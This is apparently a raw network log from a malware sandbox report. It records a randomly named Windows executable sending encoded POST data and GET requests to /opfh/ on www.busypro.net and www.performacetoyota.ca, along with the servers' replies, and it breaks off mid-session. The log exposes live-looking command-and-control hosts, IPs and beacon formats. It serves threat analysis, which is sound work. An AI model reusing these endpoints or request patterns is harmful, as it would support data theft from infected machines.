May 27, 2024 12:21:56.938652992 CEST	1236	IN	Data Raw: 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: -27.1)" style="fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	63190	160.251.148.118	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:02.706582069 CEST	708	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.busypro.net Origin: http://www.busypro.net Referer: http://www.busypro.net/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 39 6d 52 32 6c 48 4d 77 6c 71 56 36 75 75 51 72 4d 49 7a 6b 6c 4a 57 79 53 6f 58 79 4d 59 58 5a 48 36 62 72 71 69 69 33 79 61 77 4d 50 57 52 30 37 4d 78 38 51 76 76 59 6f 51 69 47 44 64 71 39 71 30 46 71 6c 5a 57 66 7a 64 4d 74 54 6d 42 6f 46 6c 77 4e 38 74 4a 51 69 70 33 33 76 6c 52 7a 31 77 44 58 70 49 2b 52 4d 53 54 43 7a 6f 4e 33 68 61 66 39 46 78 64 4d 50 50 55 57 52 46 61 57 41 59 45 75 75 63 36 49 50 4b 6e 62 4d 6c 70 59 57 45 68 37 36 4c 50 30 74 47 61 44 58 63 42 42 54 72 30 6a 43 37 7a 6f 57 66 41 76 63 54 62 64 58 42 2b 30 70 44 31 79 43 71 31 52 32 4d 48 73 4b 6c 68 59 57 47 48 4d 65 51 47 47 66 49 65 72 42 77 3d 3d Data Ascii: R40L6=9mR2lHMwlqV6uuQrMIzklJWySoXyMYXZH6brqii3yawMPWR07Mx8QvvYoQiGDdq9q0FqlZWfzdMtTmBoFlwN8tJQip33vlRz1wDXpI+RMSTCzoN3haf9FxdMPPUWRFaWAYEuuc6IPKnbMlpYWEh76LP0tGaDXcBBTr0jC7zoWfAvcTbdXB+0pD1yCq1R2MHsKlhYWGHMeQGGfIerBw==
May 27, 2024 12:22:03.528032064 CEST	377	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:22:03 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	63191	160.251.148.118	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:05.239393950 CEST	728	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.busypro.net Origin: http://www.busypro.net Referer: http://www.busypro.net/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 39 6d 52 32 6c 48 4d 77 6c 71 56 36 75 4f 41 72 4a 75 37 6b 79 35 57 31 4d 59 58 79 43 34 57 51 48 36 48 72 71 6a 58 76 6e 35 59 4d 50 79 5a 30 36 4f 4a 38 58 76 76 59 6d 77 6a 43 48 64 71 32 71 30 59 66 6c 64 57 66 7a 64 77 74 54 6a 74 6f 46 79 6b 4f 2f 64 4a 53 72 4a 33 31 68 46 52 7a 31 77 44 58 70 49 71 72 4d 53 4c 43 7a 35 64 33 68 37 66 36 47 78 64 50 49 50 55 57 48 46 61 61 41 59 46 4c 75 64 6d 6d 50 49 50 62 4d 6e 68 59 57 52 63 74 30 4c 50 49 79 57 62 51 5a 6f 5a 46 65 49 41 6b 4b 34 33 4f 59 38 38 63 64 6c 47 2f 4e 6a 79 59 33 53 4e 4a 47 6f 52 6e 68 71 61 5a 49 6b 6c 41 62 6b 7a 74 42 6e 6a 73 53 61 2f 76 58 50 78 49 4d 6a 76 35 43 76 38 35 57 6f 58 57 37 6a 37 35 31 50 41 3d Data Ascii: R40L6=9mR2lHMwlqV6uOArJu7ky5W1MYXyC4WQH6HrqjXvn5YMPyZ06OJ8XvvYmwjCHdq2q0YfldWfzdwtTjtoFykO/dJSrJ31hFRz1wDXpIqrMSLCz5d3h7f6GxdPIPUWHFaaAYFLudmmPIPbMnhYWRct0LPIyWbQZoZFeIAkK43OY88cdlG/NjyY3SNJGoRnhqaZIklAbkztBnjsSa/vXPxIMjv5Cv85WoXW7j751PA=
May 27, 2024 12:22:06.048947096 CEST	377	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:22:05 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	63192	160.251.148.118	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:07.777441025 CEST	1741	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.busypro.net Origin: http://www.busypro.net Referer: http://www.busypro.net/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 39 6d 52 32 6c 48 4d 77 6c 71 56 36 75 4f 41 72 4a 75 37 6b 79 35 57 31 4d 59 58 79 43 34 57 51 48 36 48 72 71 6a 58 76 6e 2f 41 4d 50 41 42 30 34 70 64 38 57 76 76 59 75 51 6a 42 48 64 71 52 71 30 41 62 6c 63 72 69 7a 59 38 74 4a 46 35 6f 52 58 49 4f 6f 4e 4a 53 70 4a 33 77 76 6c 51 33 31 77 7a 54 70 49 36 72 4d 53 4c 43 7a 36 56 33 6d 71 66 36 41 78 64 4d 50 50 55 53 52 46 62 48 41 59 74 39 75 64 53 59 50 35 76 62 4e 48 78 59 56 6a 30 74 34 4c 50 77 78 57 61 58 5a 74 41 62 65 49 63 65 4b 37 72 30 59 2f 73 63 64 52 33 34 52 41 61 42 6c 67 39 76 42 4a 6c 70 6a 38 65 35 46 56 77 32 47 30 75 49 4b 30 58 4e 66 38 66 45 53 6f 6f 71 5a 69 72 30 4f 4c 30 65 53 66 36 79 6e 32 76 69 72 4a 38 77 43 4d 42 63 58 72 36 52 79 61 51 35 5a 79 66 54 32 7a 4a 44 34 6b 5a 63 66 2b 55 65 56 6a 50 2b 6d 33 53 2f 4c 61 57 67 73 7a 78 37 46 54 44 4d 76 58 66 77 44 72 61 4b 6a 38 6b 64 4f 59 6a 62 4a 5a 5a 6a 78 69 6d 7a 78 34 48 4c 76 62 51 6c 72 6e 46 35 34 31 69 2b 71 79 59 55 32 6e 52 6e 6c 6d 61 65 [TRUNCATED] Data Ascii: R40L6=9mR2lHMwlqV6uOArJu7ky5W1MYXyC4WQH6HrqjXvn/AMPAB04pd8WvvYuQjBHdqRq0AblcrizY8tJF5oRXIOoNJSpJ3wvlQ31wzTpI6rMSLCz6V3mqf6AxdMPPUSRFbHAYt9udSYP5vbNHxYVj0t4LPwxWaXZtAbeIceK7r0Y/scdR34RAaBlg9vBJlpj8e5FVw2G0uIK0XNf8fESooqZir0OL0eSf6yn2virJ8wCMBcXr6RyaQ5ZyfT2zJD4kZcf+UeVjP+m3S/LaWgszx7FTDMvXfwDraKj8kdOYjbJZZjximzx4HLvbQlrnF541i+qyYU2nRnlmaeYx3v9ieCLpXRMFiFvqD3V7l47tnTniOdfFNRhAGXUkoU4TMJVp1HnVJFclKu/yKqja5ijMPwklutsoQEtOa8KJQZMfqCk6Y69sOwB51Bwtd1eqyUhCbaAsyULWJcZsWuPVudOSHISy3UMALHUQxEmqf4EynaJ5VRWr2cicgq2D0azyICdgp9ZfYmBbZccH06pOskJcvEyP0fmP8xBd2OoqZEVoZIHKXZDGNW2Ml8T9n8LdTaX7tRQIKaZL5FDv4QHzywbf0jlr6FA3+VQ1AGXL1xzZRFv4RYB4jBjiXAOGmK+jdAyfbGQuU7asgNHVUYNIvwn1XLfMTKzkmXtWdkNGUEqRFDICKNkAKdOBOczFOp4LeArJI4MBUwM6qk1Y0eBg6dR5FbcIcHCsTUkMbfyl763JEXpK6XUV+7V9RBF8ILHzTnIAxhkR/ujjqmlXcynmjEXG2DlV3ZgM5e+h8x65OBe3nelgnknch4yh6+Ixlj9D8hX8h+JLUkolYmF3LEhTnEgOOAi0Rz7r6CoLeTeIXWod0Z8Q7ey1y9n3jwLQb4zAPJdO943EcI+HBmOycVxvxJhCDWHjeTwIiFzTfcugpn7kpsYtEf1MoiDtU4or0YM2PVo791Tx+s/+gnKxpzFSoJMmJMSxBqHIwSpZG9WGwGPkB2vDa90u [TRUNCATED]
May 27, 2024 12:22:08.601552963 CEST	377	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:22:08 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	63193	160.251.148.118	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:10.319360018 CEST	455	OUT	GET /opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.busypro.net Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:22:11.141786098 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:22:11 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	63194	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:16.362613916 CEST	732	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.performacetoyota.ca Origin: http://www.performacetoyota.ca Referer: http://www.performacetoyota.ca/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 36 47 4a 2b 55 44 4c 42 42 5a 44 75 51 57 30 78 78 53 2f 38 36 2b 71 7a 4f 76 55 77 35 6f 70 73 55 4b 64 43 6f 52 52 69 4a 61 51 71 36 79 74 4c 69 41 45 4e 34 57 71 47 4f 49 79 44 65 74 73 57 71 54 6d 52 6b 38 6e 4f 48 6d 38 33 75 67 2f 6a 70 56 44 7a 78 41 2b 49 2b 74 6c 79 6d 41 6d 49 69 39 4a 6f 69 6f 73 32 52 45 6b 4e 57 6a 5a 31 4e 4d 4e 79 4a 32 61 42 69 4f 45 33 5a 4d 59 41 35 42 72 6f 62 5a 68 33 77 6c 39 53 45 4b 63 75 70 4a 75 35 43 65 71 32 67 2f 5a 30 73 56 58 35 31 76 54 5a 45 6f 30 4d 41 70 43 2f 62 6e 79 31 56 68 63 7a 47 6f 46 78 74 52 6c 6b 4d 4c 36 52 79 78 38 57 79 41 6f 36 74 53 30 55 67 51 34 56 41 3d 3d Data Ascii: R40L6=v6GJ+UDLBBZDuQW0xxS/86+qzOvUw5opsUKdCoRRiJaQq6ytLiAEN4WqGOIyDetsWqTmRk8nOHm83ug/jpVDzxA+I+tlymAmIi9Joios2REkNWjZ1NMNyJ2aBiOE3ZMYA5BrobZh3wl9SEKcupJu5Ceq2g/Z0sVX51vTZEo0MApC/bny1VhczGoFxtRlkML6Ryx8WyAo6tS0UgQ4VA==
May 27, 2024 12:22:16.816160917 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:16 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: b268309b-28a8-4282-83e5-f7f0f65ab174 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw== set-cookie: parking_session=b268309b-28a8-4282-83e5-f7f0f65ab174; expires=Mon, 27 May 2024 10:37:16 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 6f 4e 67 43 61 6e 4a 4d 70 31 46 4b 5a 44 62 46 43 31 41 6c 30 36 48 62 51 50 61 2f 4b 46 61 7a 47 6c 51 54 43 72 37 34 6b 49 6e 4c 6c 73 6d 55 5a 59 6e 66 75 71 78 6a 30 6d 65 34 71 49 37 4f 68 48 37 30 6a 62 46 73 77 66 50 4d 32 63 49 53 65 70 4a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:16.816322088 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjI2ODMwOWItMjhhOC00MjgyLTgzZTUtZjdmMGY2NWFiMTc0IiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	63195	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:18.969646931 CEST	752	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.performacetoyota.ca Origin: http://www.performacetoyota.ca Referer: http://www.performacetoyota.ca/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 36 47 4a 2b 55 44 4c 42 42 5a 44 75 77 6d 30 7a 53 36 2f 37 61 2b 74 38 75 76 55 70 4a 6f 74 73 55 47 64 43 73 41 57 69 37 2b 51 6b 2b 32 74 4d 6a 41 45 59 34 57 71 54 2b 49 7a 65 75 74 6e 57 71 65 47 52 6c 51 6e 4f 48 79 38 33 76 38 2f 6a 61 4e 41 79 68 41 72 63 4f 74 6e 76 57 41 6d 49 69 39 4a 6f 69 38 47 32 52 73 6b 4e 6d 54 5a 31 70 67 43 73 35 32 5a 47 69 4f 45 6b 4a 4d 63 41 35 42 46 6f 61 46 48 33 79 64 39 53 42 4f 63 75 34 4a 74 69 79 65 73 34 41 2b 46 37 4f 6f 39 79 32 32 78 62 55 77 31 4e 6a 35 68 2b 74 36 51 76 33 74 77 74 58 51 2b 31 76 31 54 7a 71 57 50 54 7a 31 6b 62 51 30 4a 6c 61 33 65 5a 79 78 38 44 2b 4e 30 69 6d 51 42 50 35 76 4a 36 79 54 7a 54 79 37 57 70 69 45 3d Data Ascii: R40L6=v6GJ+UDLBBZDuwm0zS6/7a+t8uvUpJotsUGdCsAWi7+Qk+2tMjAEY4WqT+IzeutnWqeGRlQnOHy83v8/jaNAyhArcOtnvWAmIi9Joi8G2RskNmTZ1pgCs52ZGiOEkJMcA5BFoaFH3yd9SBOcu4Jtiyes4A+F7Oo9y22xbUw1Nj5h+t6Qv3twtXQ+1v1TzqWPTz1kbQ0Jla3eZyx8D+N0imQBP5vJ6yTzTy7WpiE=
May 27, 2024 12:22:19.427274942 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:19 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 1b8708cd-9fad-4850-a726-f79c4b0d2f16 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw== set-cookie: parking_session=1b8708cd-9fad-4850-a726-f79c4b0d2f16; expires=Mon, 27 May 2024 10:37:19 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 6f 4e 67 43 61 6e 4a 4d 70 31 46 4b 5a 44 62 46 43 31 41 6c 30 36 48 62 51 50 61 2f 4b 46 61 7a 47 6c 51 54 43 72 37 34 6b 49 6e 4c 6c 73 6d 55 5a 59 6e 66 75 71 78 6a 30 6d 65 34 71 49 37 4f 68 48 37 30 6a 62 46 73 77 66 50 4d 32 63 49 53 65 70 4a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:19.427299023 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWI4NzA4Y2QtOWZhZC00ODUwLWE3MjYtZjc5YzRiMGQyZjE2IiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	63196	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
